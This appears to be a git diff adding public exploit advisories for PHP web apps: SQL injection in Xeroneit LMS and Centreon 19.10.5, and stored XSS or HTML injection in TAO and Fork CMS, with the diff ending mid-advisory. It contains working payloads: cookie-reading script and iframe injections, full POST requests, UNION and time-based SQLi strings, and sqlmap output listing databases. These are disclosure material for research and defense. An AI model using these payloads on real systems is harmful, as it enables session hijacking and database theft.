+https://test23.localhost:8080/dede/file_pic_view.php
+https://test23.localhost:8080/dede/file_manage_view.php
+https://test23.localhost:8080/include/dialog/select_media.php
+
+
+Solution - Fix & Patch:
+=======================
+1. Parse the content to disallow html / js and special chars on the
+affected input fields
+2. Restrict the vulnerable paramter prevent injects via post method request
+3. Secure the output location were the content is insecure sanitized
+delivered as output
+
+
+Security Risk:
+==============
+The security risk of the application-side persistent cross site
+scripting web vulnerabilities in the different modules are estimated as
+medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+--
\ No newline at end of file
diff --git a/exploits/php/webapps/48328.txt b/exploits/php/webapps/48328.txt
new file mode 100644
index 000000000..b636c548d
--- /dev/null
+++ b/exploits/php/webapps/48328.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
+# Google Dork: "LMS v3.0 - Xerone IT "
+# Date: 2020-04-09
+# Exploit Author: Sohel Yousef jellyfish security team
+# Software Link:
+https://xeroneit.net/portfolio/library-management-system-lms
+# Software Demo :https://xeroneit.co/demo/lms/home/login
+# Version: v3.0
+# Category: webapps
+
+1. Description
+scritp has SQLI in books category at this dir
+
+/lms/home/book?category_name=00*SQLI
+
+Error Number: 1064
+
+You have an error in your SQL syntax; check the manual that corresponds to
+your MySQL server version for the right syntax to use near '0' GROUP BY
+`title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3
+
+SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as
+available_book, `book_info`.`number_of_books`, `book_info`.`id`,
+`book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as
+`size`, `book_info`.`publishing_year`, `book_info`.`publisher`,
+`book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`,
+`book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`,
+`book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'',
+category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`,
+`author`, `edition` ORDER BY `title` ASC LIMIT 21
+
+Filename: models/Basic.php
+
+Line Number: 284
\ No newline at end of file
diff --git a/exploits/php/webapps/48341.txt b/exploits/php/webapps/48341.txt
new file mode 100644
index 000000000..f95c24a2d
--- /dev/null
+++ b/exploits/php/webapps/48341.txt
@@ -0,0 +1,433 @@
+# Title: TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: https://www.taotesting.com
+# Software Link: https://www.taotesting.com/product/
+# CVE: N/A
+
+Document Title:
+===============
+TAO Open Source Assessment Platform v3.3.0 RC02 - Multiple Web
+Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2215
+
+
+Release Date:
+=============
+2020-04-16
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2215
+
+
+Common Vulnerability Scoring System:
+====================================
+4
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Accelerating innovation in digital assessment. The TAO assessment
+platform gives you the freedom, control, and
+support to evolve with today's learners. For organizations who want the
+freedom to control their assessment
+software – from authoring to delivery to reporting.
+
+(Copy of the Homepage: https://www.taotesting.com/product/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+cross site vulnerabilities in the TAO Open Source Assessment Platform
+v3.3.0 RC02.
+
+
+Affected Product(s):
+====================
+Product: TAO Open Source Assessment Platform v3.3.0 RC02
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-16: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+1.1
+A html injection web vulnerability has been discovered in the TAO Open
+Source Assessment Platform v3.3.0 RC02 web-application.
+The vulnerability allows remote attackers to inject own malicious html
+codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The html inject web vulnerability is located in the `userFirstName`,
+`userLastName`, `userMail`, `password2`, and `password3`
+parameters of the user account input field. The request method to inject
+is POST and the attack vector is application-side.
+Remote attackers are able to inject html code for the user account
+credentials to provoke an execution within the main manage
+user listing.
+
+Successful exploitation of the web vulnerability results in persistent
+phishing attacks, persistent external redirects to malicious
+source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Manage Users
+
+Vulnerable Parameter(s):
+[+] userFirstName
+[+] userLastName
+[+] userMail
+[+] password2
+[+] password3
+
+
+
+1.2
+Multiple persistent cross site web vulnerabilities has been discovered
+in the TAO Open Source Assessment Platform v3.3.0 RC02.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent vulnerability is located in the content parameter of the
+Rubric Block (Add) module. Attackers are able to inject own malicious
+script code inside of the rubric name value. The attached values will be
+redisplayed in the frontend of tao. The request method to inject is
+POST and the attack vector is located on the application-side. The
+injection point is the Rubric Block (Add) module and the execution occurs
+in the frontend panel when listing the item attribute.
+
+Successful exploitation of the web vulnerability results in session
+hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected or connected
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Rubric Block (Add)
+
+Vulnerable Parameter(s):
+[+] content
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The persistent html injection web vulnerability can be exploited by
+remote attackers with privileged user account and low user interaction.
+For security demonstration or to reproduce the security web
+vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Install the application and open the ui
+2. Move on top right to the user button and click manage users
+3. Inject html script code payload into the vulnerable input fields
+4. Save the entry
+5. Open to the manage users listing
+Note: The payloads executes in the table that shows the user account
+values for admins
+6. Successful reproduce of the html inject vulnerability!
+
+
+PoC: Vulnerable Source (Manage Users)
+<th class="actions">Actions</th>
+</tr></thead>
+<tbody>
+<tr data-item-identifier="http_2_localhost_1_tao_0_rdf_3_i1586957152301539">
+<td class="login"><img
+src="https://www.evolution-sec.com/evosec-logo.png"></td>
+<td class="firstname"><img
+src="https://www.evolution-sec.com/evosec-logo.png"></td>
+<td class="lastname"><img
+src="https://www.evolution-sec.com/evosec-logo.png"></td>
+<td class="email"><img
+src="https://www.evolution-sec.com/evosec-logo.png"></td>
+<td class="roles">Test Taker</td>
+<td class="guiLg">German</td>
+<td class="status"><span class="icon-result-ok"></span> enabled</td>
+
+
+--- PoC Session Logs (POST) ---
+http://localhost:89/tao/Users/edit
+Host: localhost:89
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
+Gecko/20100101 Firefox/74.0
+Accept: text/html, */*; q=0.01
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 1393
+Origin: http://localhost:89
+Connection: keep-alive
+Referer:
+http://localhost:89/tao/Main/index?structure=users&ext=tao§ion=edit_user
+Cookie: tao_GP8CPowQ=d6et7oifjip9jnkbc7pgeotsdj;
+tao_0855799=e0a3289004cc96a4ffba7bdcb8515d3665ccd004
+user_form_sent=1&tao.forms.instance=1&token=e0a3289004cc96a4ffba7bdcb8515d3665ccd004&http_2_www_0_w3_0_org_1_2000_1_01_1_
+rdf-schema_3_label=<img
+src="https://www.evolution-sec.com/evosec-logo.png">&id=http://localhost/tao.rdf#i1586957152301539
+&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userFirstName=<img
+src="https://www.evolution-sec.com/evosec-logo.png">
+&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userLastName=<img
+src="https://www.evolution-sec.com/evosec-logo.png">
+&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userMail=<img
+src="https://www.evolution-sec.com/evosec-logo.png">&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userUILg=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langca&
+http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userRoles_9=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_DeliveryRole&
+classUri=http_2_www_0_tao_0_lu_1_Ontologies_1_TAOSubject_0_rdf_3_Subject&uri=http_2_localhost_1_tao_0_rdf_3_i1586957152301539
+&password2=<img src="https://www.evolution-sec.com/evosec-logo.png">
+&password3=<img src="https://www.evolution-sec.com/evosec-logo.png">
+-
+POST: HTTP/1.1 200 OK
+Server: Apache/2.4.38 (Win32) PHP/7.2.15
+X-Powered-By: PHP/7.2.15
+Set-Cookie: tao_0855799=a4dd4f04e0f27648dcd6ee3e966cdb380d511079; path=/
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+
+Reference(s):
+http://localhost:89/tao/Users/edit
+http://localhost:89/tao/Main/index
+
+
+
+1.2
+The persistent cross site scripting web vulnerability can be exploited
+by remote attackers with privileged user account with low user interaction.
+For security demonstration or to reproduce the cross site scripting web
+vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open and login to the tao application
+2. Move into the test module on top
+3. Add new Rubric Block
+4. Inject script code test payload into the text label content input field
+5. Save the entry and move on the right site to activate
+6. The click on activate includes and executes the content immediatly
+7. Succesful reproduce of the cross site scripting vulnerability!
+
+
+PoC: Vulnerable Source
+<div class="rubricblock-content"><div>asd>"><span
+data-serial="img_l9lmylhuv8hf55xo9z264n"
+class="widget-box widget-inline widget-img" data-qti-class="img"
+contenteditable="false">
+<img data-serial="img_l9lmylhuv8hf55xo9z264n" data-qti-class="img"
+src="" alt="" style=""
+width="100%"></span> <img data-serial="img_rxephz0lwthtejgsndo2f3"
+data-qti-class="img" src="evil.source" alt="" style="">
+>"<script>alert(document.cookie)></script></div></iframe></div></div>
+</li></ol>
+
+
+PoC: Payload
+"<script>alert(document.cookie)></script>
+
+
+--- PoC Session Logs [POST] ---
+http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612
+Host: localhost:89
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 9664
+Origin: http://localhost:89
+Connection: keep-alive
+Referer:
+http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring
+Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
+tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
+model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI
+Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[],
+"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[],
+"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false,
+"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
+1","visible":true,
+"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[],
+"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
+"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,
+"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[],
+"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses":
+false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
+1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true,
+"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef",
+"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},
+{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[],
+"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl
+":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories"
+:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[],
+"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":
+"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6",
+"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
+"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
+"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
+"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"<script>alert(document.cookie)></script>",
+"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"},
+"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No
+outcome processing.
+Erase the existing rules, if
+any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}}
+-
+POST: HTTP/1.1 200 OK
+Server: Apache/2.4.38 (Win32) PHP/7.2.15
+X-Powered-By: PHP/7.2.15
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Security-Policy: frame-ancestors 'self'
+Content-Length: 14
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: application/json; charset=UTF-8
+-
+http://localhost:89/tao/Main/evil.source
+Host: localhost:89
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
+Gecko/20100101 Firefox/75.0
+Accept: image/webp,*/*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Referer:
+http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring
+Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
+tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
+-
+GET: HTTP/1.1 200 OK
+Server: Apache/2.4.38 (Win32) PHP/7.2.15
+X-Powered-By: PHP/7.2.15
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 169
+Keep-Alive: timeout=5, max=99
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+
+Security Risk:
+==============
+1.1
+The security risk of the html inject web vulnerability in the
+web-application is estimated as medium.
+
+1.2
+The security risk of the persistent cross site scripting web
+vulnerability in the web-application is estimated as medium.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48345.txt b/exploits/php/webapps/48345.txt
new file mode 100644
index 000000000..6a9c7ba07
--- /dev/null
+++ b/exploits/php/webapps/48345.txt
@@ -0,0 +1,69 @@
+# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection
+# Date: 2020-04-19
+# Exploit Author: Basim alabdullah
+# Vendor Homepage: https://www.centreon.com
+# Software Link: https://download.centreon.com/
+# Version: v.19.10.5
+# Tested on: Centos 5
+
+
+[EXECUTIVE SUMMARY]
+
+ Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.
+
+ Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring.
+ Downloaded by hundreds and thousands of IT professionals worldwide.
+ The analysis discovered a time-based blind SQL
+ injection vulnerability in the tracker functionality of
+ Centreon Monitoring software. A malicious user can inject arbitrary
+ SQL commands to the application. The vulnerability lies in the project tracker
+ service search functionality; depending on project visibility successful
+ exploitation may require user authentication. A successful attack
+ can read, modify or delete data from the database or execute arbitrary commands on the underlying system.
+
+[VULNERABLE VERSIONS]
+
+ The following version of the Centreon Monitoring was affected by the
+ vulnerability; previous versions may be vulnerable as well:
+ - Centreon version 19.10.5
+
+
+[Proof of Concept]
+
+ http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23
+
+
+ [Payloads]
+
+ Parameter: svc_id (GET)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+ Payload: hid=15&svc_id=1 OR NOT 5782=5782
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy)
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 5 columns
+ Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL#
+---
+[12:24:35] [INFO] testing MySQL
+[12:24:35] [INFO] confirming MySQL
+[12:24:35] [INFO] the back-end DBMS is MySQL
+[12:24:35] [INFO] fetching banner
+web server operating system: Linux Red Hat
+web application technology: Apache 2.4.34, PHP 7.2.24
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+banner: '10.1.38-MariaDB'
+[12:24:35] [INFO] fetching database names
+[12:24:35] [INFO] starting 4 threads
+[12:24:35] [INFO] resumed: 'centreon'
+[12:24:35] [INFO] resumed: 'test'
+[12:24:35] [INFO] resumed: 'centreon_storage'
+[12:24:35] [INFO] resumed: 'information_schema'
+available databases [4]:
+[*] centreon
+[*] centreon_storage
+[*] information_schema
+[*] test
\ No newline at end of file
diff --git a/exploits/php/webapps/48348.txt b/exploits/php/webapps/48348.txt
new file mode 100644
index 000000000..64d991ee6
--- /dev/null
+++ b/exploits/php/webapps/48348.txt
@@ -0,0 +1,491 @@
+# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: https://www.fork-cms.com/download
+# Software Link: https://github.com/forkcms/forkcms/pull/3073
+# CVE: N/A
+
+Document Title:
+===============
+Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2208
+
+ID (3073): https://github.com/forkcms/forkcms/pull/3073
+
+
+Release Date:
+=============
+2020-04-17
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2208
+
+
+Common Vulnerability Scoring System:
+====================================
+5.3
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Fork is an easy to use open source CMS using Symfony Components. Fork
+CMS is dedicated to creating a user friendly environment
+to build, monitor and
+update your website. We take great pride in being the Content Management
+System of choice for beginners and professionals.
+
+(Copy of the Homepage: https://www.fork-cms.com &
+https://www.fork-cms.com/download )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+persistent web vulnerabilities in the official Fork CMS v5.8.0.
+
+
+Affected Product(s):
+====================
+ForkCMS
+Product: Fork CMS v5.8.0 - Content Management System (Web-Application)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-17: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+Multiple persistent input validation web vulnerabilities has been
+discovered in the official Fork CMS v5.8.0 open-source web-application.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent input validation web vulnerabilities are located in the
+`Displayname` input field when using the `Add`, `Edit` or `Register`
+mechanism that forwards the information into the `var` parameter. Remote
+attackers and privileged application user accounts are able to
+inject own malicious persistent script code as the users displayname by
+usage of the registration module (/profiles/register). Privileged
+users with access to the profile or users module are able to exploit the
+issue by a simple inject. The displayname then becomes visible in
+the Admin - Profiles Index on Preview, Edit User/Profile, Delete User
+Interaction and User Index in Listing modules. the var parameter
+does not encode or parse the exisiting injected content and executes it.
+The request method to inject is POST and the attack vector of the
+vulnerability is located on the application-side of the content
+management system. The injection point is located in the registration form
+and the add/edit user function. The execution point of the issue occurs
+in the preview profile, edit user, user index listing and delete
+user message context.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, persistent phishing attacks, persistent external redirects to
+malicious source and persistent manipulation of affected application
+modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Register
+[+] Add User
+[+] Edit User
+
+Vulnerable Input(s):
+[+] Displayname
+
+Vulnerable Parameter(s):
+[+] var
+
+Affected Module(s):
+[+] Preview Profile
+[+] Edit User
+[+] User Index
+[+] Delete User
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation web vulnerabilities can be exploited by
+remote attackers with low privileged user account and low user interaction.
+For security demonstration or to reproduce the security vulnerability
+follow the provided information an steüs below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Open the fork cms web-application newst version
+2. Move via sitemap or by link to the registration page
+(/modules/profiles/register)
+3. Inject your script code payload html/js to the Displayname input field
+4. Register the account by pushing submit
+5. Activate the link in the account registration email
+Note: Now simple wait until the administrator / privileged user visits
+the panel to execute the code on interaction or preview only
+6. Successful reproduce of the persistent script code injection
+vulnerability!
+
+
+PoC: Vulnerable Source (User Index in Listing -
+https://fork-cms.localhost:8080/private/en/users/index)
+<tr id="row-2" class="even">
+<td class="nickname"><a
+href="/private/en/users/edit?token=k7byefqor8&id=2"
+title="edit">test3"><iframe src="evil.source"
+onload=alert(document.cookie)></a></td>
+<td class="fork-data-grid-action actionEdit"><a
+href="/private/en/users/edit?token=k7byefqor8&id=2"
+class="btn btn-default btn-xs pull-right">
+<span class="fa fa-pencil" aria-hidden="true"></span> Edit</a></td>
+</tr>
+
+
+PoC: Vulnerable Source (Profiles Index on Preview -
+https://fork-cms.localhost:8080/private/en/profiles/index)
+<tbody><tr id="row-1" class="odd">
+<td class="check"><input type="checkbox" name="id[]" value="1"
+class="inputCheckbox checkBeforeUnload"></td>
+<td class="email"><a
+href="/private/en/profiles/edit?token=k7byefqor8&id=1"
+title="">tester23@protonmail.com</a></td>
+<td class="display_name">"<iframe src="evil.source"
+onload="alert(document.cookie)"></td>
+<td class="registered_on">13 April 2020 11:17</td>
+<td class="fork-data-grid-action actionEdit">
